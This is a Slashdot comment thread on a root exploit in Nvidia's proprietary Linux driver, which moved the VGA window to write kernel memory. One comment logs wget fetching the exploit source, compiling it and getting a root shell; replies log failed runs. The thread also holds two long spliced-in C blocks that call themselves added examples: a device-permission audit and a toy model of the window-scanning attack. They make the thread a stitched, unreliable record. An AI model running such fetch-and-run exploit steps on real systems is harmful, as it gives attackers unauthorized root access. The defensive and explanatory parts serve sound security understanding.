Slashdot: News for Nerds

Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

Unknown Lamer posted about 2 years ago | from the rms-gazes-upon-you-smugly dept.

Security 180

An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Airlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.


180 comments

Use Windows | +5 Insightful (5, Funny)

h910 (2698573) | about 2 years ago | (#40844929)

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Re:Use Windows | +5 Insightful (5, Funny)

broginator (1955750) | about 2 years ago | (#40845139)

That's like saying "Drive Fords, that way you won't crash in a Chevy."

Re: (1)

Fwipp (1473271) | about 2 years ago | (#40845895)

Especially if you're referring to a Pinto.

Re:Use Windows | +5 Insightful (4, Insightful)

Tapewolf (1639955) | about 2 years ago | (#40846391)

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Since Nvidia's drivers share a large amount of common code, I'd say it's only a matter of time.

Re:Use Windows | +5 Insightful (1)

pulski (126566) | about 2 years ago | (#40846449)

Don't feed the trolls.

h### account name promoting Microsoft. I'm shocked!

Re:Use Windows | +5 Insightful (0)

Anonymous Coward | about 2 years ago | (#40846591)

Wow. Microsoft's shills are actually using the subject header to try to mislead Slashdot readers into thinking the post was rated anything above the -2 it deserves*? Good gravy, everyone, this is it. THIS is what Microsoft's desperation looks like when they discover they can't buy or bully their way through the tech world any more.

*: Yes, I know they fixed that bug a long time ago.

Re:Use Windows | +5 Insightful (0)

Anonymous Coward | about 2 years ago | (#40847125)

You're pretty paranoid if you think that's a Microsoft shill.

The header trick is WAY too smart for them.

Use Windows (Sore:200,000, Parent is an Amature) (0, Funny)

Anonymous Coward | about 2 years ago | (#40846593)

Pssst..... Amature.

CAPTCHA = muddlers

Re:Use Windows (Sore:200,000, Parent is an Amature (0)

Anonymous Coward | about 2 years ago | (#40847097)

He may indeed be an amateur, but at least he didn't misspell anything, let alone a ridiculously common and simple word.

A view to a kill. (2, Interesting)

Anonymous Coward | about 2 years ago | (#40844961)

Shouldn't the VGA window be a window into the video memory, or at least configuration registers?

Re:A view to a kill. (5, Informative)

greg1104 (461138) | about 2 years ago | (#40845101)

VGA maps the video card's memory [osdever.net] into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by wanting to retain compatibility with older video standards (CGA, EGA).

Re:A view to a kill. (3, Insightful)

causality (777677) | about 2 years ago | (#40845681)

Removing that is further complicated by wanting to retain compatibility with older video standards (CGA, EGA).

... that nobody uses anymore, at least not with PC hardware.

Re:A view to a kill. (2)

The MAZZTer (911996) | about 2 years ago | (#40846117)

Guess what, your computer boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.

Re:A view to a kill. (2, Insightful)

Anonymous Coward | about 2 years ago | (#40845683)

Is this due to a very old code base in the windows driver, and the driver code being shared between both linux and windows? Compatibility makes sense if you are running DOS or allowing DOS apps to function (or maybe 16-bit windows). But I very much doubt Monochrome, CGA, EGA, and some of the old VGA standard works at all in modern windows, and definitely not in linux.

This should never have been exposed to the user in linux and hopefully not in windows either. And if compatibility is a concern, then it should be through emulation and a protected path if hardware access is useful.

Re:A view to a kill. (3, Informative)

Desler (1608317) | about 2 years ago | (#40845759)

Windows 7 still includes a VGA video driver.

Re:A view to a kill. (2)

rjr162 (69736) | about 2 years ago | (#40846143)

That it does. Reimaged a Dell e6240 laptop using IBM's Tivoli system manager the other week, and it apparently failed at some point. Everything installed and worked except the one video driver.
These laptops can use the built-in Intel video for battery savings and switch over to a built-in Nvidia "card" when more grunt is needed. The issue was the laptop wouldn't output video to an external monitor. I checked in Device Manager and the Nvidia card was listed as it should be, but the Intel video was listed as "generic VGA", which still allowed video to display on the laptop screen but didn't have the ability to work with an external monitor.

Re:A view to a kill. (1)

hobarrera (2008506) | about 2 years ago | (#40846473)

Users wanting monochrome/CGA/EGA could just use nouveau, the only reason to use the nvidia binary blob is to support 2D/3D acceleration.

Nope (2)

FranTaylor (164577) | about 2 years ago | (#40847481)

TwinView doesn't work in nouveau

Re:A view to a kill. (3, Insightful)

greg1104 (461138) | about 2 years ago | (#40846931)

VGA works fine in Windows and in Linux. See Linux framebuffer [wikipedia.org] as a relatively modern implementation. (I say relatively modern because I'd been using Linux for a long time before it was added, and it's new compared to things like X-Windows) PC hardware is certainly not so abstracted away by useful APIs that the drivers can ignore this level of detail, to be protected from them. Manipulating this sort of thing is exactly what a driver is written to do.

Your suggestion that this shouldn't have been exposed to the user is missing the point: this is an exploit. The driver itself needs to know all these details to properly initialize itself and support old-school text/VGA modes during boot. The user was likely never intended to have access to them, but an exploit isn't limited to what the user is supposed to do. Whether or not the path is protected or not is irrelevant if the path is bypassed.

Re:A view to a kill. (3, Interesting)

MightyMartian (840721) | about 2 years ago | (#40846311)

So how does Windows deal with restricting where this window can be remapped?

Re:A view to a kill. (1)

hobarrera (2008506) | about 2 years ago | (#40846451)

But do we really need this backwards compatibility? Look at the supported video cards; does anyone that uses those cards need compatibility with that? The driver also required a relatively recent kernel; so again, is this compatibility required?

I'm not trying to be ironic, I'm legitimately in doubt here.

Re:A view to a kill. (1)

shentino (1139071) | about 2 years ago | (#40847029)

Older video standards have been banned ever since KMS depended on FBCON in the kernel.

Woohoo! Nvidia drivers rock! (-1, Flamebait)

MatthiasF (1853064) | about 2 years ago | (#40844979)

Obligatory fanboy zing.

Re:Woohoo! Nvidia drivers rock! (-1)

Anonymous Coward | about 2 years ago | (#40845189)

Yes, they do. nouveau sucks fat, hairy dicks.

Hoooo boy... (4, Interesting)

Tarlus (1000874) | about 2 years ago | (#40845025)

With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it.

Re:Hoooo boy... (0)

DaveV1.0 (203135) | about 2 years ago | (#40846639)

And, Nvidia will not care what the FOSS community does. 90+% of Nvidia's customers don't use FOSS at all. So many people forget that FLOSS is, at best, a niche market and as such has little influence on business decisions.

Re:Hoooo boy... (5, Insightful)

Anonymous Coward | about 2 years ago | (#40846825)

Correct. That's why I choose AMD.

Not that they're that much better, but at least they tried to.

Re:Hoooo boy... (0)

Anonymous Coward | about 2 years ago | (#40847087)

I think Nvidia cares. But not as much for gamers as for GPGPU number crunchers.

Re:Hoooo boy... (2, Insightful)

Anonymous Coward | about 2 years ago | (#40847261)

Nvidia's future is going to be determined almost entirely on success or failure of the Tegra line, which will predominantly run Android. That's why Linus flipped them the bird. Nvidia, as a company, is becoming increasingly dependent upon Linux to succeed financially. Yet they are not making any effort to engage developers or the community at large.

Open Source Advantage (5, Insightful)

Nerdfest (867930) | about 2 years ago | (#40845027)

I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

Re:Open Source Advantage (0)

Anonymous Coward | about 2 years ago | (#40845109)

Can't do half of what I like to do with my computer using nouveau, it sucks.

Re:Open Source Advantage (5, Funny)

Dagger2 (1177377) | about 2 years ago | (#40845197)

Clearly the proprietary driver is much better then, since it allows me to do whatever I like with your computer.

Re:Open Source Advantage (1)

jedidiah (1196) | about 2 years ago | (#40845325)

You have to get to it first. Good luck with that.

Re:Open Source Advantage (-1)

Anonymous Coward | about 2 years ago | (#40845951)

You got an nVidia GPU, right? Don't look, but Dagger2 is already ordering stuff on your behalf. I hope you like receiving boxes of SPAM from eBay and Amazon!

I'll take my chances (0)

Anonymous Coward | about 2 years ago | (#40845515)

People don't buy HD cards to get tearing, pixelated images and laggy playback using shitty opensource drivers.

But before the zealots complain about closed drivers, they might try coming up with some decent opensource A/V players that are fully featured and actually work.

Not to mention, for years zealots have been deriding ATI cards, then I finally switch, and Linus gets a hardon for nvidia.

Re:I'll take my chances (2)

konaya (2617279) | about 2 years ago | (#40845899)

Or better yet: nVidia could actually make their driver open source. That way, we'll have all the bells and whistles, and when a security flaw gets known the community can patch it without nVidia's involvement.

Re:I'll take my chances (0)

Anonymous Coward | about 2 years ago | (#40846367)

Two things:

1. Everybody who knows enough about the guts of nVidia hardware to write HW accelerated drivers for it is employed by nVidia already

2. There are probably huge patent, trade secret and NDA issues even if they wanted to release the source.

Also, http://xkcd.com/619/

For limited values of "you" (4, Funny)

Anonymous Coward | about 2 years ago | (#40845825)

It needs a local execution method (either another exploit or a tricked user) and access to /dev/nvidia0.

So, for example, even if you exploit a web service to execute this on a suitable machine, you still won't get anything as long as web service's user doesn't have permissions on /dev/nvidia0.

Worst of all, it still needs downloading and compiling sources. WTF, Linux? When are we going to get all the software available prepackaged and regularly updated from the repository? Other OSes handle it well, no need for "wget && patch && gcc" to get this working, no need for sudo and sometimes even no need for any actions from user AT ALL, simply visit a page and it just works!
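The condition in the comment above (the exploit only helps an attacker who already has a process that can open /dev/nvidia0) can be checked in C. This is an added example written for this thread, not Nvidia's or any distribution's tooling; the only device path it audits by default is the /dev/nvidia0 named in the discussion. It evaluates the classic Unix permission bits the way the kernel's DAC check does (owner class if the uid matches, otherwise group class if any of the caller's groups matches, otherwise other; uid 0 short-circuits as CAP_DAC_OVERRIDE would) and reports whether the calling process could open the node read/write. POSIX ACLs, SELinux or AppArmor policy, and udev rules that re-chown the node at login are not modelled, so a "no" from this check is necessary for safety but not sufficient.

```c
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Classic Unix DAC decision: does a caller with uid `uid` and group list
 * `gids` get every permission in `want` (a mask of R_OK/W_OK/X_OK) on an
 * object with the given mode, owner and group? Exactly one class applies:
 * owner if the uid matches, else group if any gid matches, else other.
 * uid 0 passes unconditionally, as CAP_DAC_OVERRIDE would let it. */
static int dac_allows(mode_t mode, uid_t owner, gid_t group, uid_t uid,
                      const gid_t *gids, size_t ngids, int want)
{
    if (uid == 0)
        return 1;
    unsigned bits;
    if (uid == owner) {
        bits = (mode >> 6) & 7u;
    } else {
        int in_group = 0;
        for (size_t i = 0; i < ngids; i++)
            if (gids[i] == group) { in_group = 1; break; }
        bits = in_group ? (mode >> 3) & 7u : mode & 7u;
    }
    unsigned need = 0;
    if (want & R_OK) need |= 4u;
    if (want & W_OK) need |= 2u;
    if (want & X_OK) need |= 1u;
    return (bits & need) == need;
}

/* Coarse exposure of a device node: 2 = any local user can open it (other
 * bits grant read or write), 1 = members of its group can, 0 = owner only.
 * Read *or* write counts, because either is enough to issue ioctls. */
static int exposure_class(mode_t mode)
{
    if (mode & (S_IROTH | S_IWOTH)) return 2;
    if (mode & (S_IRGRP | S_IWGRP)) return 1;
    return 0;
}

/* stat() a node and report whether the calling process could open it
 * read/write under DAC. Returns 1 (yes), 0 (no) or -1 (path absent). */
static int audit_device(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0) {
        printf("%s: not present\n", path);
        return -1;
    }
    /* supplementary groups plus the effective gid, which getgroups() need not list */
    int n = getgroups(0, NULL);
    if (n < 0) n = 0;
    gid_t *gids = calloc((size_t)n + 1, sizeof *gids);
    if (gids == NULL)
        return -1;
    n = n > 0 ? getgroups(n, gids) : 0;
    if (n < 0) n = 0;
    gids[n++] = getegid();

    int ok = dac_allows(st.st_mode, st.st_uid, st.st_gid, geteuid(),
                        gids, (size_t)n, R_OK | W_OK);
    struct group *gr = getgrgid(st.st_gid);
    static const char *const classes[] = { "owner only", "group members", "any local user" };
    printf("%s: mode %04o owner uid %u group %s(%u); openable by: %s; this process rw: %s\n",
           path, (unsigned)(st.st_mode & 07777u), (unsigned)st.st_uid,
           gr ? gr->gr_name : "?", (unsigned)st.st_gid,
           classes[exposure_class(st.st_mode)], ok ? "yes" : "no");
    free(gids);
    return ok;
}

int main(int argc, char **argv)
{
    if (argc > 1) {
        for (int i = 1; i < argc; i++)
            audit_device(argv[i]);
    } else {
        audit_device("/dev/nvidia0");   /* the node named in the thread */
    }
    return 0;
}
```

Run it as the account you are worried about (the web server's user, in the comment's example) to see whether that account can reach the driver at all. A node whose class comes back as "any local user" means every local account, including a service account compromised through some unrelated bug, can feed ioctls to the driver; "group members" narrows it to whoever is in the video group on that box, which on a desktop is usually every logged-in user.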

Re:For limited values of "you" (4, Insightful)

Nerdfest (867930) | about 2 years ago | (#40847133)

When are we going to get all the software available prepackaged and regularly updated from the repository?

That's a fairly half-hearted troll. Most Linux distros have package management and multi-source software repositories that make iOS, Metro, and OS X look like the limited attempts at platform lock-in that they really are.

Re:Open Source Advantage (1)

ilikenwf (1139495) | about 2 years ago | (#40845527)

It's hard to run GL based apps in Wine or use VMWare machines with nouveau...I've tried...that's all it lacks for me to use it all the time.

Re:Open Source Advantage (0)

Anonymous Coward | about 2 years ago | (#40846005)

I use VMware machines with radeon driver on an AMD card. Works perfectly.

Re:Open Source Advantage (1)

Zontar The Mindless (9002) | about 2 years ago | (#40847475)

I use VMWare almost every single day on a Linux host that employs the Nouveau drivers, and it works fine. KDE 4 desktop on the host, a bit of eye candy.

If you're trying to use the Nouveau (or even the proprietary) drivers *inside* a VMware guest, that's just silly, and I really hope that's not what you meant.

Re:Open Source Advantage (0)

Anonymous Coward | about 2 years ago | (#40845675)

yeah, it sucks... Can't do half of what I like to do with your computer using nouveau.

Re:Open Source Advantage (1)

hobarrera (2008506) | about 2 years ago | (#40846517)

It could have happened, and most probably would have happened at some point, but might have been spotted sooner, and would have been fixed long ago now.
Plus, I'm sure there's plenty of other bugs/exploits we still haven't even discovered.

It might have been patched already... (1)

tlambert (566799) | about 2 years ago | (#40846659)

I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

Sure, it'd be patched, and you could probably apply the patch locally, but it wouldn't be in the official repository yet. And then you get to wait for the review process, where someone tells you how they would have done it differently, if they only had the time or the interest, but since you didn't do it that way, you need to rewrite your patch. This is pretty much true of most Open Source communities, which tend not to take rough consensus and working code, and then clean up the cosmetic stuff later.

Then you get to wait for it to move from "development" to "beta" to "stable" before it actually makes it into an official release version. In most Open Source communities, this whole thing can take months.

In general, I'd have to say Open Source doesn't win over closed in this case, and I say that as a long time Open Source person.

Who did he send it to at Nvidia? (-1, Flamebait)

Meshach (578918) | about 2 years ago | (#40845085)

So no one at Nvidia replied when some random joe off the street sent flimsy evidence of a vague exploit to them unsolicited? Can't say I am surprised...

Re:Who did he send it to at Nvidia? (5, Insightful)

Anonymous Coward | about 2 years ago | (#40845187)

Maybe people need to stop being apologists for this kind of thing...

Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.

Maybe if Nvidia had better quality random Joes, when this sort of stuff did pass by them it would get escalated and not deleted.

Re:Who did he send it to at Nvidia? (0)

Anonymous Coward | about 2 years ago | (#40845247)

I read that as "So no one at Nvidia could be bothered to spend 15 minutes and check out the evidence to a reported exploit."

Re:Who did he send it to at Nvidia? (5, Informative)

nedlohs (1335013) | about 2 years ago | (#40845255)

Yeah you don't get more flimsy evidence than a working exploit.

Re:Who did he send it to at Nvidia? (4, Interesting)

ZeroSumHappiness (1710320) | about 2 years ago | (#40845467)

If you're not surprised then I hope it's because you expect Nvidia to be shite. Microsoft, as policy (though possibly not practice), fully evaluates any possible security exploits submitted because they assume that among the cranks who've already broken through the airlock there might be a real security exploit. This is expensive but necessary. If Nvidia can't do the same then I'll have to seriously consider my choices next time I'm buying a card.

Re:Who did he send it to at Nvidia? (-1)

Anonymous Coward | about 2 years ago | (#40845569)

Oh no! One less neckbeard for their support people to deal with. I'm sure they're quaking with fright.

Re:Who did he send it to at Nvidia? (1)

Anonymous Coward | about 2 years ago | (#40845625)

/steps on the soap box. Heh, Microsoft the one with the most security holes of the bunch and you are throwing these statements around? They have holes from years ago that they haven't fixed and just come back with the "upgrade your OS" line of B.S. And UAC is supposed to make Windows Vista/7 secure, that is a joke.

I fully understand that it takes a while for companies to stamp out bugs but I think companies have become far too lax on their bug squashing. The people that buy their products become their beta testers and this to me is just wrong. I do software testing and I know from 20 yrs of testing that companies will downgrade bugs even if they are considered critical by the testers just to get a product out the door on time. They will then try to minimize the damage until they can put out the next version with a hopeful fix in them.

I think we need to make some of these companies responsible for their horrible code and lack of testing. /steps off the soap box

Re:Who did he send it to at Nvidia? (2)

ZeroSumHappiness (1710320) | about 2 years ago | (#40845901)

I didn't say Windows was perfect, just that if you send a (crank) security exploit to Microsoft they review it. They may not fix it. They may say the best that you can do is upgrade, but they know whether or not it's a real hole. (At least, that's the policy.)

Nvidia rotten to the core (2, Insightful)

Jerry Atrick (2461566) | about 2 years ago | (#40845215)

Nvidia are just serial fuckups. Wasted half my Saturday trying to find a driver release that would work on my wife's Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.

Nvidia, still haven't forgotten all the accelerated functions in your chipsets that gradually got turned off as drivers updated, because the hardware was rotten to the core and couldn't be made to work. Or the ongoing multi year saga of begging for working PAL TV support, all of it falling on deaf ears. Or the magically vanished TV out support when Vista shipped.

Frankly a root exploit is one of their lesser sins.

Re:Nvidia rotten to the core (0, Troll)

ilikenwf (1139495) | about 2 years ago | (#40845575)

If you ran a distro that didn't suck, you wouldn't be having issues... Archlinux, gentoo, slackware...I mean, Arch would work best for you here - you just "yaourt -S nvidia-beta-all" and done.

Re:Nvidia rotten to the core (3, Insightful)

Anonymous Coward | about 2 years ago | (#40845855)

Seriously? This is the kind of shit that makes people hate us Linux users. "Oh, you had a problem? Should have used $MY_FAVORITE_DISTRO then it would have worked! (Unless it still didn't, but let's just ignore that possibility so I can be a smug bastard.)"

Re:Nvidia rotten to the core (2)

hobarrera (2008506) | about 2 years ago | (#40846585)

His advice makes sense.
You bought hardware from a company unwilling to document its hardware and unwilling to release its drivers, installed a distro that opts for FLOSS drivers, and then complained the combination didn't work. Of course it didn't, you can't just have ANY software run with ANY hardware perfectly as you expect it to.

Re:Nvidia rotten to the core (0)

Anonymous Coward | about 2 years ago | (#40847157)

He's not running some obscure distro called Gnu/Wierdo Linux, it's friggin Kubuntu, which is Ubuntu with KDE. An Nvidia card ought to work if it will work at all on linux. And if it wouldn't, then Nvidia shouldn't claim to support Linux.

  And you're ignoring the fact that Nvidia's support still sucks.

distro wars or idiot vs adept. (1)

OrangeTide (124937) | about 2 years ago | (#40847159)

If people keep insisting on abusing their watered down idiot's distro, then crying when it doesn't work, we're going to keep telling them to use the right tool for the job!

Re:Nvidia rotten to the core (1)

interval1066 (668936) | about 2 years ago | (#40845811)

Frankly a root exploit is one of their lesser sins.

Then their cardinal sins must be Hitlerian; (from David Airlie's write-up)

It basically abuses the fact that the /dev/nvidia0 device accepts changes to the VGA window and moves the window around until it can read/write to somewhere useful in physical RAM, then it just does a priv escalation by writing directly to kernel memory.

It doesn't take a lot of thought to understand the implications of the hole. And smacks of pure laziness on the part of nVidia.
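The mechanism described in the two comments above (greg1104's point that the VGA window maps the card's memory into the CPU address space, and the write-up's description of the exploit moving that window around until it lands on useful physical RAM) modelled in C. This is an added example, not code from the thread, from the write-up or from the Nvidia driver: the aperture size, the fake VRAM range, the phys[] array standing in for physical memory, the 8-byte marker standing in for the kernel structure the real exploit hunts for, and the set_window()/window_read()/window_write() calls standing in for the device's ioctl interface are all assumptions made for the illustration. set_window_vuln() accepts any aligned base, which is the bug class; set_window_fixed() shows the check the driver needs: the window may only ever cover the device's own memory.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PHYS_SIZE   (1u << 20)  /* 1 MiB standing in for all of physical RAM */
#define VRAM_BASE   0x80000u    /* the card's own memory starts here (assumed) */
#define VRAM_SIZE   0x20000u    /* ... and is 128 KiB long (assumed)          */
#define WINDOW_SIZE 0x10000u    /* 64 KiB aperture, like the legacy VGA window */

static uint8_t  phys[PHYS_SIZE];   /* fake physical memory */
static uint32_t window_base;       /* physical address the window maps now */

typedef int (*set_window_fn)(uint32_t base);

/* Vulnerable driver: any aligned base that fits in memory is accepted, so
 * userspace can aim the window at kernel memory. */
static int set_window_vuln(uint32_t base)
{
    if (base % WINDOW_SIZE != 0 || base > PHYS_SIZE - WINDOW_SIZE)
        return -1;
    window_base = base;
    return 0;
}

/* Fixed driver: the window may only ever cover the device's own memory. */
static int set_window_fixed(uint32_t base)
{
    if (base % WINDOW_SIZE != 0)
        return -1;
    if (base < VRAM_BASE || base > VRAM_BASE + VRAM_SIZE - WINDOW_SIZE)
        return -1;
    window_base = base;
    return 0;
}

/* Userspace-reachable accessors. Their bounds checks are correct and still
 * useless: the attacker controls where the window sits, not just the offset. */
static int window_read(uint32_t off, void *buf, size_t len)
{
    if (off >= WINDOW_SIZE || len > WINDOW_SIZE - off)
        return -1;
    memcpy(buf, &phys[window_base + off], len);
    return 0;
}

static int window_write(uint32_t off, const void *buf, size_t len)
{
    if (off >= WINDOW_SIZE || len > WINDOW_SIZE - off)
        return -1;
    memcpy(&phys[window_base + off], buf, len);
    return 0;
}

/* Constructed 8-byte tag standing in for a recognisable kernel structure. */
static const uint8_t marker[8] = { 'K', 'E', 'R', 'N', 'M', 'A', 'R', 'K' };

static int plant_marker(uint32_t pa)
{
    if (pa > PHYS_SIZE - sizeof marker)
        return -1;
    memcpy(&phys[pa], marker, sizeof marker);
    return 0;
}

/* Attacker step 1: slide the window across physical memory one aperture at a
 * time, read each slice and look for the marker. Returns its physical
 * address, or -1 if no window position the driver allows contains it. */
static long find_through_window(set_window_fn set_window)
{
    static uint8_t chunk[WINDOW_SIZE];
    for (uint32_t base = 0; base <= PHYS_SIZE - WINDOW_SIZE; base += WINDOW_SIZE) {
        if (set_window(base) != 0)
            continue;                  /* driver refused this position */
        if (window_read(0, chunk, sizeof chunk) != 0)
            continue;
        for (size_t i = 0; i + sizeof marker <= sizeof chunk; i++)
            if (memcmp(&chunk[i], marker, sizeof marker) == 0)
                return (long)(base + i);
    }
    return -1;
}

/* Attacker step 2: point the window at the target and overwrite 4 bytes. */
static int write_phys_through_window(set_window_fn set_window, uint32_t pa, uint32_t value)
{
    uint32_t base = pa - pa % WINDOW_SIZE;
    if (set_window(base) != 0)
        return -1;
    return window_write(pa - base, &value, sizeof value);
}

static uint32_t read_phys(uint32_t pa)
{
    uint32_t v;
    memcpy(&v, &phys[pa], sizeof v);
    return v;
}

int main(void)
{
    plant_marker(0x54321u);
    long hit = find_through_window(set_window_vuln);
    printf("vulnerable driver: marker found at physical 0x%lx\n", (unsigned long)hit);
    if (hit >= 0 && write_phys_through_window(set_window_vuln, (uint32_t)hit, 0xdeadbeefu) == 0)
        printf("vulnerable driver: overwrote it, now 0x%08x\n", read_phys((uint32_t)hit));
    printf("fixed driver: scan result %ld\n", find_through_window(set_window_fixed));
    printf("fixed driver: write to 0x54321 -> %d\n",
           write_phys_through_window(set_window_fixed, 0x54321u, 0u));
    return 0;
}
```

Built as-is it runs the scan against both variants: with the vulnerable driver the marker planted at 0x54321 is found and overwritten, with the fixed one the scan only ever sees VRAM and the write outside it is refused. The point worth taking from it is that the offset checks inside window_read()/window_write() are fine and irrelevant; the property the driver has to enforce is where the window is allowed to point, and that check belongs at the moment userspace asks to move it.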

Re:Nvidia rotten to the core (4, Informative)

Jerry Atrick (2461566) | about 2 years ago | (#40846071)

Frankly a root exploit is one of their lesser sins.

Then their cardinal sins must be Hitlerian; (from David Airlie's write-up)

You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.

First they spent months claiming there was no bug.
Then they spent months claiming they'd fixed it (they hadn't).
Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!

Over a year of data loss for anyone that believed them.

Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.

Re:Nvidia rotten to the core (2)

gl4ss (559668) | about 2 years ago | (#40847025)

haha, that's a fucking classic.

makes me laugh almost as hard as believing that I'd get video decoding support in gpu when I bought a gf 6800 back in the day(you know, because it said so on the box). "In late 2005, an update to Nvidia's website finally confirmed what had long been suspected by the user community: WMV-acceleration is not available on the AGP 6800. Of course, today's standard computers are fast enough to play WMV9 video and other sophisticated codecs like MPEG-4, H.264 or Theora without hardware acceleration." (I'm just kidding, I didn't believe them to have actually working acceleration for video decode when I bought them, I did however think that they'd get it sorted out in the drivers for some random video player program to use.. never happened).

Re:Nvidia rotten to the core (5, Insightful)

fuzzyfuzzyfungus (1223518) | about 2 years ago | (#40846107)

Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...

Re:Nvidia rotten to the core (0)

Anonymous Coward | about 2 years ago | (#40846001)

shouldn't run linux nube go to windows.

Re:Nvidia rotten to the core (1)

Fwipp (1473271) | about 2 years ago | (#40846061)

I recommend booting from a LiveCD before installing so you can see if the drivers work.

Re:Nvidia rotten to the core (1)

hobarrera (2008506) | about 2 years ago | (#40846551)

In your particular case, the issue is Ubuntu, that does not ship the driver properly, or have any simple way of installing it, and not Nvidia. You'd better use a distro that actually supports it, or use hardware(and driver) your distro completely supports.

works here (5, Informative)

Anonymous Coward | about 2 years ago | (#40845239)

It's certainly legit..

c@v:~$
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$ ./nvid-root
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#

sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#

sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise

sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#

Re:works here (5, Informative)

dmitrygr (736758) | about 2 years ago | (#40845707)

64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

[*] IDT offset at 0xffffffff81b60000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81b60dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.

Re:works here (0)

Anonymous Coward | about 2 years ago | (#40846047)

me@mine:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin
me@mine:~$ mv 86747-001.bin nvid-root.c
me@mine:~$ gcc nvid-root.c -o nvid-root
me@mine:~$ ./nvid-root
[*] IDT offset at 0xffffffff81e35000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81e35dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.
me@mine:~$ uname -a
Linux foofoo 3.1.10-1.16-desktop #1 SMP PREEMPT Wed Jun 27 05:21:40 UTC 2012 (d016078) x86_64 x86_64 x86_64 GNU/Linux
me@mine:~$ rpm -qa | grep -i nvidia
nvidia-computeG02-295.49-17.1.x86_64
x11-video-nvidiaG02-295.49-17.1.x86_64
nvidia-gfxG02-kmp-desktop-295.49_k3.1.0_1.2-16.1.x86_64

Re:works here (0)

Anonymous Coward | about 2 years ago | (#40846307)

// This should probably work for 64-bits and 32-bits kernels
// But only tested on 64-bits kernels
inline static long init_kallsyms(struct kallsyms *ks) ...

Funny thing from the code, they say they tested it on 64 bit kernels but it *should* work on 32 bit, but from the above posts, it didn't work on two 64 bit kernels but did work on the 32 bit.

Re:works here (3, Interesting)

Ken_g6 (775014) | about 2 years ago | (#40846123)

Doesn't work for me on Linux Mint Debian Edition with Xfce, nVidia driver version x86_64-290.10:

uname -a | sed -e 's/^[^0-9]*//'
3.2.0-2-amd64 #1 SMP Sun Mar 4 22:48:17 UTC 2012 x86_64 GNU/Linux

lsb_release -a
LSB Version: core-2.0-amd64:core-2.0-noarch:core-3.0-amd64:core-3.0-noarch:core-3.1-amd64:core-3.1-noarch:core-3.2-amd64:core-3.2-noarch
Distributor ID: LinuxMint
Description: Linux Mint Xfce Edition
Release: 1
Codename: debian

./nvid-root
[*] IDT offset at 0xffffffff8172a000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff8172adc0)
[*] Enhancing gate entry...
[*] Triggering payload...
Killed

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500504] Oops: 0000 [#1] SMP

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500641] Stack:

